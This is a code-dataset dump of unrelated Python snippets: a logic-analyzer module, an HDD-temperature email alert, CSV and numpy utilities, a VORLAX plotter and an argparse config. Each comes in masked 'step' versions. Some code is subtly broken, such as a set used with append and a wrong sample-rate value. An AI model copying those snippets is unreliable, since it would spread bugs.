100000), ('50K',\n 50000), ('10K', 10000), ('2K', 2000)))\n sample_rates = OrderedDict((('1 MS/s', 1000000), ('500 KS/s', 500000),\n ('200 KS/s', 200000), ('100 KS/s', 10000)))\n\n def __init__(self, sample_rate=1000000.0, sample_count=64000,\n trigger_type=0, trigger_channel=0):\n sp = int(1.0 / sample_rate / 1e-06)\n self.sample_count = sample_count\n self.sample_rate = sample_rate\n sample_count /= 1000\n self.command_bytes = [1, sp & 255, sp >> 8, sample_count & 255, \n sample_count >> 8, trigger_type, trigger_channel]\n self.command_bytes = ''.join([chr(x) for x in self.command_bytes]\n ) + ' ' * (64 - len(self.command_bytes))\n\n\nclass ThemeManager:\n \"\"\"\n A class to manage and load themes for the signal display.\n \"\"\"\n\n def __init__(self, theme_dir):\n self.theme_dir = theme_dir\n self.refresh()\n\n def refresh(self):\n self.themes = []\n for fname in os.listdir(self.theme_dir):\n if fname.endswith('.json'):\n try:\n j = json.loads(open(os.path.join(self.theme_dir, fname)\n ).read())\n self.themes.append(j)\n except:\n continue\n\n def theme_names(self):\n \"\"\"\n Returns the names for each theme.\n \"\"\"\n return [theme.get('name', 'Error') for theme in self.themes]\n\n def theme_named(self, name):\n \"\"\"\n Returns the theme named name.\n\n Paramters\n ---------\n name : str\n The name of the theme to return.\n\n Returns\n -------\n Returns the theme as a dict, or an empty dict 
if theme could not be\n found.\n \"\"\"\n for theme in self.themes:\n if theme.get('name', 'Error') == name:\n return theme\n", "step-5": "\"\"\"\nThis file contains the general data storage classes used throughout Logician.\n\"\"\"\nimport csv\nimport json\nimport os\nfrom collections import OrderedDict\n\nVALID_CHANNEL_COUNTS = [4]\n\n\nclass Acquisition:\n \"\"\"\n The acqusition object contains data from all of the acquired channels.\n\n Parameters\n ----------\n data : array or bytes or str\n Array of form [[1, 0, 0, ...], [0, 0, 1, ...], ...]\n or bytes of data.\n If data is bytes, channel_count must be provided.\n\n samplerate : int\n The acquisition rate in Samples / sec.\n \"\"\"\n def __init__(self, data, sample_rate=1, channel_count=None):\n if isinstance(data, list):\n if len(data) not in VALID_CHANNEL_COUNTS:\n raise ValueError('data must have length %s'\n % str(VALID_CHANNEL_COUNTS))\n l = len(data[0])\n for channel in data:\n if len(channel) != l:\n raise ValueError('All channels must be have same length.')\n self.data = data\n elif isinstance(data, bytes):\n if channel_count not in VALID_CHANNEL_COUNTS:\n raise ValueError('Invalid number of channels.')\n # Convert byte string to list of 1's and 0's. If there are 4\n # channels each byte should have 2 4 channel samples in it. The MSB\n # is the 4th channel of the least recent sample.\n sep_channel_data = [f(c) for c in data\n for f in (lambda x: ord(x) >> 4,\n lambda x: ord(x) & 0x0F)]\n unpacked_data = [[int(i) for i in list(bin(d)[2:].zfill(4))]\n for d in sep_channel_data]\n self.data = list(zip(*unpacked_data))\n self.data.reverse()\n elif isinstance(data, str):\n self.load_csv_file(data)\n return\n else:\n raise TypeError('Invalid data type')\n self.sample_rate = sample_rate\n\n @property\n def dt(self):\n return 1.0 / self.sample_rate\n\n @property\n def acquisition_length(self):\n return len(self.data[0])\n\n @property\n def channel_count(self):\n return len(self.data)\n\n def csv_string(self):\n out_string = '#sample_rate=%d' % self.sample_rate\n for row in zip(*self.data):\n out_string += str(row)[1:-1].replace(' ', '')\n out_string += '\\n'\n return out_string\n\n def load_csv_file(self, fname):\n with open(fname) as f:\n reader = csv.reader(f)\n header = next(reader)\n sample_rate = int(header[0].split('=')[-1])\n data = [[int(d) for d in row] for row in reader\n if len(row) != 1]\n self.data = list(zip(*data))\n self.sample_rate = sample_rate\n\n def __len__(self):\n return len(self.data)\n\n def __getitem__(self, key):\n return self.data[key]\n\n def __iter__(self):\n return iter(self.data)\n\n\nclass AnalyzerCommand:\n \"\"\"\n Simple class to hold analyzer commands and create appropriate command bytes\n to be sent to the firmware.\n \"\"\"\n sample_counts = OrderedDict((('200K', 200000),\n ('100K', 100000),\n ('50K', 50000),\n ('10K', 10000),\n ('2K', 2000)))\n sample_rates = OrderedDict((('1 MS/s', 1000000),\n ('500 KS/s', 500000),\n ('200 KS/s', 200000),\n ('100 KS/s', 10000)))\n\n def __init__(self, sample_rate=1e6, sample_count=64000,\n trigger_type=0, trigger_channel=0):\n sp = int(1.0 / sample_rate / 1e-6)\n self.sample_count = sample_count\n self.sample_rate = sample_rate\n sample_count /= 1000\n self.command_bytes = \\\n [0x01, # Command\n (sp & 0x00FF), (sp >> 8), # Sample Period (us)\n (sample_count & 0x00FF), (sample_count >> 8),\n trigger_type, trigger_channel]\n self.command_bytes = (''.join([chr(x) for x in self.command_bytes]) +\n ' '*(64 - len(self.command_bytes)))\n\n\nclass ThemeManager:\n 
\"\"\"\n A class to manage and load themes for the signal display.\n \"\"\"\n def __init__(self, theme_dir):\n self.theme_dir = theme_dir\n self.refresh()\n\n def refresh(self):\n self.themes = []\n for fname in os.listdir(self.theme_dir):\n if fname.endswith('.json'):\n try:\n j = json.loads(\n open(os.path.join(self.theme_dir, fname)).read())\n self.themes.append(j)\n except:\n continue\n\n def theme_names(self):\n \"\"\"\n Returns the names for each theme.\n \"\"\"\n return [theme.get('name', 'Error') for theme in self.themes]\n\n def theme_named(self, name):\n \"\"\"\n Returns the theme named name.\n\n Paramters\n ---------\n name : str\n The name of the theme to return.\n\n Returns\n -------\n Returns the theme as a dict, or an empty dict if theme could not be\n found.\n \"\"\"\n for theme in self.themes:\n if theme.get('name', 'Error') == name:\n return theme\n", "step-ids": [ 13, 15, 19, 20, 24 ] }
[ 13, 15, 19, 20, 24 ]
""" Write two functions: 1. `to_list()`, which converts a number to an integer list of its digits. 2. `to_number()`, which converts a list of integers back to its number. ### Examples to_list(235) ➞ [2, 3, 5] to_list(0) ➞ [0] to_number([2, 3, 5]) ➞ 235 to_number([0]) ➞ 0 ### Notes All test cases will be weakly positive numbers: `>= 0` """ def to_list(num): a=list(map(int,str(num))) return a ​ def to_number(lst): res=int("".join(map(str,lst))) return res
normal
{ "blob_id": "5cced6d9f5e01b88951059bc89c5d10cfd160f60", "index": 8826, "step-1": "\"\"\"\r\n\n\nWrite two functions:\n\n 1. `to_list()`, which converts a number to an integer list of its digits.\n 2. `to_number()`, which converts a list of integers back to its number.\n\n### Examples\n\n to_list(235) ➞ [2, 3, 5]\n \n to_list(0) ➞ [0]\n \n to_number([2, 3, 5]) ➞ 235\n \n to_number([0]) ➞ 0\n\n### Notes\n\nAll test cases will be weakly positive numbers: `>= 0`\n\n\"\"\"\r\n\ndef to_list(num):\n a=list(map(int,str(num)))\n return a\n \n​\ndef to_number(lst):\n res=int(\"\".join(map(str,lst)))\n return res\n\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
#!/usr/bin/env python3 import os import subprocess import emailgen # # Header information # recipient = input("recipient: ") sender = input("sender: ") password = input("sender password: ") subject = "hdd temp alert" # # Get hdd temp, format for email # output = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc', shell=True) text = output.decode('utf-8') # # Email requires ascii # text = text.encode('ascii','ignore') text = text.decode('ascii') # # Add descriptive information to text # text += "\nHostname: " + os.uname().nodename # # Call sendAlert function # emailgen.sendAlert(recipient, subject, text, sender, password)
normal
{ "blob_id": "26a6fe0b2a98aa77b63a336cd6c2afcfe81d9058", "index": 7680, "step-1": "<mask token>\n", "step-2": "<mask token>\ntext += '\\nHostname: ' + os.uname().nodename\nemailgen.sendAlert(recipient, subject, text, sender, password)\n", "step-3": "<mask token>\nrecipient = input('recipient: ')\nsender = input('sender: ')\npassword = input('sender password: ')\nsubject = 'hdd temp alert'\noutput = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc',\n shell=True)\ntext = output.decode('utf-8')\ntext = text.encode('ascii', 'ignore')\ntext = text.decode('ascii')\ntext += '\\nHostname: ' + os.uname().nodename\nemailgen.sendAlert(recipient, subject, text, sender, password)\n", "step-4": "import os\nimport subprocess\nimport emailgen\nrecipient = input('recipient: ')\nsender = input('sender: ')\npassword = input('sender password: ')\nsubject = 'hdd temp alert'\noutput = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc',\n shell=True)\ntext = output.decode('utf-8')\ntext = text.encode('ascii', 'ignore')\ntext = text.decode('ascii')\ntext += '\\nHostname: ' + os.uname().nodename\nemailgen.sendAlert(recipient, subject, text, sender, password)\n", "step-5": "#!/usr/bin/env python3\nimport os\nimport subprocess\nimport emailgen\n\n\n#\n# Header information\n#\nrecipient = input(\"recipient: \")\nsender = input(\"sender: \")\npassword = input(\"sender password: \")\nsubject = \"hdd temp alert\"\n\n#\n# Get hdd temp, format for email\n#\noutput = subprocess.check_output('sudo hddtemp /dev/sda /dev/sdb /dev/sdc', shell=True)\ntext = output.decode('utf-8')\n\n#\n# Email requires ascii\n#\ntext = text.encode('ascii','ignore')\ntext = text.decode('ascii')\n\n#\n# Add descriptive information to text\n#\ntext += \"\\nHostname: \" + os.uname().nodename\n\n#\n# Call sendAlert function\n#\nemailgen.sendAlert(recipient, subject, text, sender, password)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import csv with open('./csvs/users.csv', encoding='utf-8', newline='') as users_csv: reader = csv.reader(users_csv) d = {} for row in reader: userId, profileName = row if profileName == 'A Customer': continue value = d.get(profileName) if not value: d.setdefault(profileName, userId) else: if value != userId: print(f'{userId}, {value}, {profileName}')
normal
{ "blob_id": "3b77f7ea5137174e6723368502659390ea064c5a", "index": 8968, "step-1": "<mask token>\n", "step-2": "<mask token>\nwith open('./csvs/users.csv', encoding='utf-8', newline='') as users_csv:\n reader = csv.reader(users_csv)\n d = {}\n for row in reader:\n userId, profileName = row\n if profileName == 'A Customer':\n continue\n value = d.get(profileName)\n if not value:\n d.setdefault(profileName, userId)\n elif value != userId:\n print(f'{userId}, {value}, {profileName}')\n", "step-3": "import csv\nwith open('./csvs/users.csv', encoding='utf-8', newline='') as users_csv:\n reader = csv.reader(users_csv)\n d = {}\n for row in reader:\n userId, profileName = row\n if profileName == 'A Customer':\n continue\n value = d.get(profileName)\n if not value:\n d.setdefault(profileName, userId)\n elif value != userId:\n print(f'{userId}, {value}, {profileName}')\n", "step-4": "import csv\n\nwith open('./csvs/users.csv', encoding='utf-8', newline='') as users_csv:\n reader = csv.reader(users_csv)\n d = {}\n for row in reader:\n userId, profileName = row\n if profileName == 'A Customer':\n continue\n value = d.get(profileName)\n if not value:\n d.setdefault(profileName, userId)\n else:\n if value != userId:\n print(f'{userId}, {value}, {profileName}')", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import numpy as np raw = np.load("raw_with_freq.npy").item() for i in list(raw.keys()): if len(i) > 8: del(raw[i]) print(raw) print(len(list(raw.keys()))) np.save("shorten_raw_with_freq.npy", raw)
normal
{ "blob_id": "ffb17b370c892696b341f6d37a2cfe106a5670a5", "index": 4265, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor i in list(raw.keys()):\n if len(i) > 8:\n del raw[i]\nprint(raw)\nprint(len(list(raw.keys())))\nnp.save('shorten_raw_with_freq.npy', raw)\n", "step-3": "<mask token>\nraw = np.load('raw_with_freq.npy').item()\nfor i in list(raw.keys()):\n if len(i) > 8:\n del raw[i]\nprint(raw)\nprint(len(list(raw.keys())))\nnp.save('shorten_raw_with_freq.npy', raw)\n", "step-4": "import numpy as np\nraw = np.load('raw_with_freq.npy').item()\nfor i in list(raw.keys()):\n if len(i) > 8:\n del raw[i]\nprint(raw)\nprint(len(list(raw.keys())))\nnp.save('shorten_raw_with_freq.npy', raw)\n", "step-5": "import numpy as np\nraw = np.load(\"raw_with_freq.npy\").item()\nfor i in list(raw.keys()):\n\tif len(i) > 8:\n\t\tdel(raw[i])\nprint(raw)\nprint(len(list(raw.keys())))\nnp.save(\"shorten_raw_with_freq.npy\", raw)\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
def lengthOfLongestSubstring(s):
    max_len = 0
    for i in range(len(s)):
        storage = set()
        count = 0
        for j in range(i, len(s)):
            if s[j] not in storage:
                storage.add(s[j])
                count += 1
            else:
                break
        max_len = max(max_len, count)
    return max_len


print(lengthOfLongestSubstring('abcabcbb'))
normal
{ "blob_id": "7e83d11bb43229eaa199514b4be6a0acf3ab36ce", "index": 4395, "step-1": "<mask token>\n", "step-2": "def lengthOfLongestSubstring(s):\n max_len = 0\n for i in range(len(s)):\n storage = set()\n count = 0\n for j in range(i, len(s)):\n if not s[j] in storage:\n storage.append(s[j])\n count += 1\n else:\n break\n max_len = max(max_len, count)\n return max_len\n\n\n<mask token>\n", "step-3": "def lengthOfLongestSubstring(s):\n max_len = 0\n for i in range(len(s)):\n storage = set()\n count = 0\n for j in range(i, len(s)):\n if not s[j] in storage:\n storage.append(s[j])\n count += 1\n else:\n break\n max_len = max(max_len, count)\n return max_len\n\n\nprint(lengthOfLongestSubstring('abcabcbb'))\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
# -*- coding: utf-8 -*- """ VorRun Runs Vorlax and plots wireframe output from Vorlax (https://github.com/GalaxyHobo/VORLAX) NOTE! Type: "%matplotlib auto" in iPython console to switch to interactive plots, or "%matplotlib inline" to switch to inline, in the console. NOTE! Reads path to Vorlax .exe in "path.txt" file that resides in same directory as vorRun.py. The path in that file must be on the first line and begin with drive letter + colon, or "\". Assumes C-drive if path begins with "\". Lance Bays """ import os from mpl_toolkits.mplot3d import axes3d import matplotlib.pyplot as plt import numpy as np # Establish working directory with exe... # Copy & paste absolute path on Local machine here within double quotes # Read path to working directory fout = open("path.txt", 'r') userExePath=fout.readline() fout.close() # Split drive Letter from path drive, exePath = userExePath.split("\\", 1) # Handle case where user doesn't include drive in path — # we will assume it's on the C drive. if not drive: drive="C:" # Run program # Command-line instructions to change drive & directory, and run program runString = drive + " && cd \\" + exePath + " && vorlax.exe" os.system( runString) # Read output file fout = open(drive + "\\" + exePath + "\\VORLAX.WIRE", 'r') lines=fout.readlines() fout.close() # Convert to numpy array panelData=[] for index, line in enumerate(lines): panelData.append(np.array(list(map(float,lines[index].split())))) panelData=np.array(panelData) # Determine array of unique panel ID's panelNums = np.unique(panelData[0:,0:1]) # Add subplot fig = plt.figure() ax = fig.add_subplot(111, projection='3d') # Plot the Vorlax wireframe (one side) for index in panelNums: ax.plot_wireframe( panelData[panelData[:,0]==index][:,np.array([False,True,False,False,False])], panelData[panelData[:,0]==index][:,np.array([False,False,True,False,False])], panelData[panelData[:,0]==index][:,np.array([False,False,False,True,False])]) # Plot the mirror image (if symmetry is indicated in wire file) for index in panelNums: symFlag=panelData[panelData[:,0]==index][0,np.array([False,False,False,False,True])] if symFlag==0 or symFlag==2: ax.plot_wireframe( panelData[panelData[:,0]==index][:,np.array([False,True,False,False,False])], -1*panelData[panelData[:,0]==index][:,np.array([False,False,True,False,False])], panelData[panelData[:,0]==index][:,np.array([False,False,False,True,False])]) # Format plot ax.grid() ax.set(ylabel='y-in', xlabel='x-in', zlabel='z-in', title='') ax.xaxis.label.set_size(16) ax.yaxis.label.set_size(16) ax.zaxis.label.set_size(16) # Create super-set of data to establish ranges x=panelData[:,1] y=panelData[:,2] negativey = -1 * panelData[:,2] y=np.concatenate((y, negativey), axis=0) z=panelData[:,3] # Set equal scales on axes ax.set_aspect('equal') # Set ranges for plot max_range = np.array([x.max() - x.min(), y.max() - y.min(), z.max() - z.min()]).max() / 2.0 # Compute midpoints in each direction mid_x = (x.max() + x.min()) * 0.5 mid_y = (y.max() + y.min()) * 0.5 mid_z = (z.max() + z.min()) * 0.5 # Set final ranges ax.set_xlim(mid_x - max_range, mid_x + max_range) ax.set_ylim(mid_y - max_range, mid_y + max_range) ax.set_zlim(mid_z - max_range, mid_z + max_range) plt.show()
normal
{ "blob_id": "9aee715e976db632f0829a06cb9e0101c90512be", "index": 2150, "step-1": "<mask token>\n", "step-2": "<mask token>\nfout.close()\n<mask token>\nif not drive:\n drive = 'C:'\n<mask token>\nos.system(runString)\n<mask token>\nfout.close()\n<mask token>\nfor index, line in enumerate(lines):\n panelData.append(np.array(list(map(float, lines[index].split()))))\n<mask token>\nfor index in panelNums:\n ax.plot_wireframe(panelData[panelData[:, 0] == index][:, np.array([\n False, True, False, False, False])], panelData[panelData[:, 0] ==\n index][:, np.array([False, False, True, False, False])], panelData[\n panelData[:, 0] == index][:, np.array([False, False, False, True, \n False])])\nfor index in panelNums:\n symFlag = panelData[panelData[:, 0] == index][0, np.array([False, False,\n False, False, True])]\n if symFlag == 0 or symFlag == 2:\n ax.plot_wireframe(panelData[panelData[:, 0] == index][:, np.array([\n False, True, False, False, False])], -1 * panelData[panelData[:,\n 0] == index][:, np.array([False, False, True, False, False])],\n panelData[panelData[:, 0] == index][:, np.array([False, False, \n False, True, False])])\nax.grid()\nax.set(ylabel='y-in', xlabel='x-in', zlabel='z-in', title='')\nax.xaxis.label.set_size(16)\nax.yaxis.label.set_size(16)\nax.zaxis.label.set_size(16)\n<mask token>\nax.set_aspect('equal')\n<mask token>\nax.set_xlim(mid_x - max_range, mid_x + max_range)\nax.set_ylim(mid_y - max_range, mid_y + max_range)\nax.set_zlim(mid_z - max_range, mid_z + max_range)\nplt.show()\n", "step-3": "<mask token>\nfout = open('path.txt', 'r')\nuserExePath = fout.readline()\nfout.close()\ndrive, exePath = userExePath.split('\\\\', 1)\nif not drive:\n drive = 'C:'\nrunString = drive + ' && cd \\\\' + exePath + ' && vorlax.exe'\nos.system(runString)\nfout = open(drive + '\\\\' + exePath + '\\\\VORLAX.WIRE', 'r')\nlines = fout.readlines()\nfout.close()\npanelData = []\nfor index, line in enumerate(lines):\n panelData.append(np.array(list(map(float, lines[index].split()))))\npanelData = np.array(panelData)\npanelNums = np.unique(panelData[0:, 0:1])\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nfor index in panelNums:\n ax.plot_wireframe(panelData[panelData[:, 0] == index][:, np.array([\n False, True, False, False, False])], panelData[panelData[:, 0] ==\n index][:, np.array([False, False, True, False, False])], panelData[\n panelData[:, 0] == index][:, np.array([False, False, False, True, \n False])])\nfor index in panelNums:\n symFlag = panelData[panelData[:, 0] == index][0, np.array([False, False,\n False, False, True])]\n if symFlag == 0 or symFlag == 2:\n ax.plot_wireframe(panelData[panelData[:, 0] == index][:, np.array([\n False, True, False, False, False])], -1 * panelData[panelData[:,\n 0] == index][:, np.array([False, False, True, False, False])],\n panelData[panelData[:, 0] == index][:, np.array([False, False, \n False, True, False])])\nax.grid()\nax.set(ylabel='y-in', xlabel='x-in', zlabel='z-in', title='')\nax.xaxis.label.set_size(16)\nax.yaxis.label.set_size(16)\nax.zaxis.label.set_size(16)\nx = panelData[:, 1]\ny = panelData[:, 2]\nnegativey = -1 * panelData[:, 2]\ny = np.concatenate((y, negativey), axis=0)\nz = panelData[:, 3]\nax.set_aspect('equal')\nmax_range = np.array([x.max() - x.min(), y.max() - y.min(), z.max() - z.min()]\n ).max() / 2.0\nmid_x = (x.max() + x.min()) * 0.5\nmid_y = (y.max() + y.min()) * 0.5\nmid_z = (z.max() + z.min()) * 0.5\nax.set_xlim(mid_x - max_range, mid_x + max_range)\nax.set_ylim(mid_y - max_range, mid_y + 
max_range)\nax.set_zlim(mid_z - max_range, mid_z + max_range)\nplt.show()\n", "step-4": "<mask token>\nimport os\nfrom mpl_toolkits.mplot3d import axes3d\nimport matplotlib.pyplot as plt\nimport numpy as np\nfout = open('path.txt', 'r')\nuserExePath = fout.readline()\nfout.close()\ndrive, exePath = userExePath.split('\\\\', 1)\nif not drive:\n drive = 'C:'\nrunString = drive + ' && cd \\\\' + exePath + ' && vorlax.exe'\nos.system(runString)\nfout = open(drive + '\\\\' + exePath + '\\\\VORLAX.WIRE', 'r')\nlines = fout.readlines()\nfout.close()\npanelData = []\nfor index, line in enumerate(lines):\n panelData.append(np.array(list(map(float, lines[index].split()))))\npanelData = np.array(panelData)\npanelNums = np.unique(panelData[0:, 0:1])\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nfor index in panelNums:\n ax.plot_wireframe(panelData[panelData[:, 0] == index][:, np.array([\n False, True, False, False, False])], panelData[panelData[:, 0] ==\n index][:, np.array([False, False, True, False, False])], panelData[\n panelData[:, 0] == index][:, np.array([False, False, False, True, \n False])])\nfor index in panelNums:\n symFlag = panelData[panelData[:, 0] == index][0, np.array([False, False,\n False, False, True])]\n if symFlag == 0 or symFlag == 2:\n ax.plot_wireframe(panelData[panelData[:, 0] == index][:, np.array([\n False, True, False, False, False])], -1 * panelData[panelData[:,\n 0] == index][:, np.array([False, False, True, False, False])],\n panelData[panelData[:, 0] == index][:, np.array([False, False, \n False, True, False])])\nax.grid()\nax.set(ylabel='y-in', xlabel='x-in', zlabel='z-in', title='')\nax.xaxis.label.set_size(16)\nax.yaxis.label.set_size(16)\nax.zaxis.label.set_size(16)\nx = panelData[:, 1]\ny = panelData[:, 2]\nnegativey = -1 * panelData[:, 2]\ny = np.concatenate((y, negativey), axis=0)\nz = panelData[:, 3]\nax.set_aspect('equal')\nmax_range = np.array([x.max() - x.min(), y.max() - y.min(), z.max() - z.min()]\n ).max() / 2.0\nmid_x = (x.max() + x.min()) * 0.5\nmid_y = (y.max() + y.min()) * 0.5\nmid_z = (z.max() + z.min()) * 0.5\nax.set_xlim(mid_x - max_range, mid_x + max_range)\nax.set_ylim(mid_y - max_range, mid_y + max_range)\nax.set_zlim(mid_z - max_range, mid_z + max_range)\nplt.show()\n", "step-5": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nVorRun\r\n\r\nRuns Vorlax and plots wireframe output from Vorlax\r\n(https://github.com/GalaxyHobo/VORLAX)\r\n\r\nNOTE! Type: \"%matplotlib auto\" in iPython console to \r\nswitch to interactive plots, or \"%matplotlib inline\" \r\nto switch to inline, in the console.\r\n\r\nNOTE! Reads path to Vorlax .exe in \"path.txt\" file that resides in\r\nsame directory as vorRun.py. The path in that file must be on the \r\nfirst line and begin with drive letter + colon, or \"\\\". Assumes\r\nC-drive if path begins with \"\\\".\r\n\r\nLance Bays\r\n\"\"\"\r\n\r\nimport os\r\nfrom mpl_toolkits.mplot3d import axes3d\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n# Establish working directory with exe...\r\n# Copy & paste absolute path on Local machine here within double quotes\r\n\r\n# Read path to working directory\r\nfout = open(\"path.txt\", 'r')\r\nuserExePath=fout.readline()\r\nfout.close()\r\n\r\n# Split drive Letter from path\r\ndrive, exePath = userExePath.split(\"\\\\\", 1)\r\n\r\n# Handle case where user doesn't include drive in path —\r\n# we will assume it's on the C drive. 
\r\nif not drive: drive=\"C:\"\r\n\r\n# Run program\r\n# Command-line instructions to change drive & directory, and run program \r\nrunString = drive + \" && cd \\\\\" + exePath + \" && vorlax.exe\" \r\nos.system(\trunString)\r\n\r\n# Read output file\r\nfout = open(drive + \"\\\\\" + exePath + \"\\\\VORLAX.WIRE\", 'r')\r\nlines=fout.readlines()\r\nfout.close()\r\n\r\n# Convert to numpy array \r\npanelData=[]\r\nfor index, line in enumerate(lines):\r\n panelData.append(np.array(list(map(float,lines[index].split()))))\r\npanelData=np.array(panelData)\r\n\r\n# Determine array of unique panel ID's\r\npanelNums = np.unique(panelData[0:,0:1])\r\n\r\n# Add subplot\r\nfig = plt.figure()\r\nax = fig.add_subplot(111, projection='3d')\r\n\r\n# Plot the Vorlax wireframe\t(one side)\r\nfor index in panelNums:\r\n ax.plot_wireframe(\r\n panelData[panelData[:,0]==index][:,np.array([False,True,False,False,False])],\r\n panelData[panelData[:,0]==index][:,np.array([False,False,True,False,False])],\r\n panelData[panelData[:,0]==index][:,np.array([False,False,False,True,False])])\r\n\r\n# Plot the mirror image (if symmetry is indicated in wire file)\r\nfor index in panelNums:\r\n symFlag=panelData[panelData[:,0]==index][0,np.array([False,False,False,False,True])]\r\n if symFlag==0 or symFlag==2:\r\n ax.plot_wireframe(\r\n panelData[panelData[:,0]==index][:,np.array([False,True,False,False,False])],\r\n -1*panelData[panelData[:,0]==index][:,np.array([False,False,True,False,False])],\r\n panelData[panelData[:,0]==index][:,np.array([False,False,False,True,False])])\r\n\r\n# Format plot\r\nax.grid()\r\nax.set(ylabel='y-in',\r\n xlabel='x-in',\r\n zlabel='z-in',\r\n title='')\r\nax.xaxis.label.set_size(16)\r\nax.yaxis.label.set_size(16)\r\nax.zaxis.label.set_size(16)\r\n\r\n# Create super-set of data to establish ranges \r\nx=panelData[:,1]\r\ny=panelData[:,2]\r\nnegativey = -1 * panelData[:,2]\r\n\r\ny=np.concatenate((y, negativey), axis=0)\r\nz=panelData[:,3]\r\n\r\n# Set equal scales on axes\r\nax.set_aspect('equal')\r\n\r\n# Set ranges for plot\r\nmax_range = np.array([x.max() - x.min(),\r\n y.max() - y.min(),\r\n z.max() - z.min()]).max() / 2.0\r\n\r\n# Compute midpoints in each direction \r\nmid_x = (x.max() + x.min()) * 0.5 \r\nmid_y = (y.max() + y.min()) * 0.5\r\nmid_z = (z.max() + z.min()) * 0.5\r\n\r\n# Set final ranges\r\nax.set_xlim(mid_x - max_range, mid_x + max_range)\r\nax.set_ylim(mid_y - max_range, mid_y + max_range)\r\nax.set_zlim(mid_z - max_range, mid_z + max_range)\r\nplt.show()", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
#-*- coding: utf-8 -*-
import argparse
import pickle

def str2bool(v):
    return v.lower() in ('true', '1')


arg_lists = []
parser = argparse.ArgumentParser()

def add_argument_group(name):
    arg = parser.add_argument_group(name)
    arg_lists.append(arg)
    return arg


# Network
net_arg = add_argument_group('Network')
net_arg.add_argument('--num_steps', type=int, default=150, help='')
net_arg.add_argument('--cell_size', type=int, default=700, help='')
net_arg.add_argument('--hyper_size', type=int, default=400, help='')
net_arg.add_argument('--embed_size', type=int, default=128, help='')
net_arg.add_argument('--hidden_size', type=int, default=256, help='')
net_arg.add_argument('--num_layers', type=int, default=2, help='')
net_arg.add_argument('--fast_layers', type=int, default=2, help='')
net_arg.add_argument('--zoneout_c', type=float, default=0.5, help='')
net_arg.add_argument('--zoneout_h', type=float, default=0.9, help='')
net_arg.add_argument('--keep_prob', type=float, default=0.65, help='')
net_arg.add_argument('--input_dim', type=int, default=300, help='')
net_arg.add_argument('--num_glimpse', type=int, default=1, help='')
net_arg.add_argument('--use_terminal_symbol', type=str2bool, default=True, help='Not implemented yet')

# Data
data_arg = add_argument_group('Data')
data_arg.add_argument('--task', type=str, default='ptb')
data_arg.add_argument('--batch_size', type=int, default=128)
data_arg.add_argument('--vocab_size', type=int, default=50)
data_arg.add_argument('--input_size', type=int, default=300)
data_arg.add_argument('--min_data_length', type=int, default=5)
data_arg.add_argument('--max_data_length', type=int, default=80)
data_arg.add_argument('--train_num', type=int, default=1000000)
data_arg.add_argument('--valid_num', type=int, default=1000)
data_arg.add_argument('--test_num', type=int, default=1000)

# Training / test parameters
train_arg = add_argument_group('Training')
train_arg.add_argument('--is_train', type=str2bool, default=True, help='')
train_arg.add_argument('--optimizer', type=str, default='rmsprop', help='')
train_arg.add_argument('--max_epoch', type=int, default=200, help='')
train_arg.add_argument('--max_max_epoch', type=int, default=200, help='')
train_arg.add_argument('--max_step', type=int, default=1000000, help='')
train_arg.add_argument('--init_scale', type=float, default=0.002, help='')
train_arg.add_argument('--lr_start', type=float, default=0.01, help='')
train_arg.add_argument('--lr_decay_step', type=int, default=5000, help='')
train_arg.add_argument('--lr_decay_rate', type=float, default=0.1, help='')
train_arg.add_argument('--max_grad_norm', type=float, default=1.0, help='')
train_arg.add_argument('--checkpoint_secs', type=int, default=300, help='')

# Misc
misc_arg = add_argument_group('Misc')
misc_arg.add_argument('--log_step', type=int, default=2, help='')
misc_arg.add_argument('--num_log_samples', type=int, default=3, help='')
misc_arg.add_argument('--log_level', type=str, default='INFO', choices=['INFO', 'DEBUG', 'WARN'], help='')
misc_arg.add_argument('--log_dir', type=str, default='logs')
misc_arg.add_argument('--data_dir', type=str, default='data')
misc_arg.add_argument('--output_dir', type=str, default='outputs')
misc_arg.add_argument('--data_path', type=str, default='/Ujjawal/fast-slow-lstm/data')
misc_arg.add_argument('--debug', type=str2bool, default=False)
misc_arg.add_argument('--gpu_memory_fraction', type=float, default=1.0)
misc_arg.add_argument('--random_seed', type=int, default=123, help='')

def get_config():
    config, unparsed = parser.parse_known_args()
    return config
normal
{ "blob_id": "dfaea1687238d3d09fee072689cfdea392bc78f9", "index": 8967, "step-1": "<mask token>\n\n\ndef str2bool(v):\n return v.lower() in ('true', '1')\n\n\n<mask token>\n\n\ndef add_argument_group(name):\n arg = parser.add_argument_group(name)\n arg_lists.append(arg)\n return arg\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef str2bool(v):\n return v.lower() in ('true', '1')\n\n\n<mask token>\n\n\ndef add_argument_group(name):\n arg = parser.add_argument_group(name)\n arg_lists.append(arg)\n return arg\n\n\n<mask token>\n\n\ndef get_config():\n config, unparsed = parser.parse_known_args()\n return config\n", "step-3": "<mask token>\n\n\ndef str2bool(v):\n return v.lower() in ('true', '1')\n\n\narg_lists = []\nparser = argparse.ArgumentParser()\n\n\ndef add_argument_group(name):\n arg = parser.add_argument_group(name)\n arg_lists.append(arg)\n return arg\n\n\nnet_arg = add_argument_group('Network')\nnet_arg.add_argument('--num_steps', type=int, default=150, help='')\nnet_arg.add_argument('--cell_size', type=int, default=700, help='')\nnet_arg.add_argument('--hyper_size', type=int, default=400, help='')\nnet_arg.add_argument('--embed_size', type=int, default=128, help='')\nnet_arg.add_argument('--hidden_size', type=int, default=256, help='')\nnet_arg.add_argument('--num_layers', type=int, default=2, 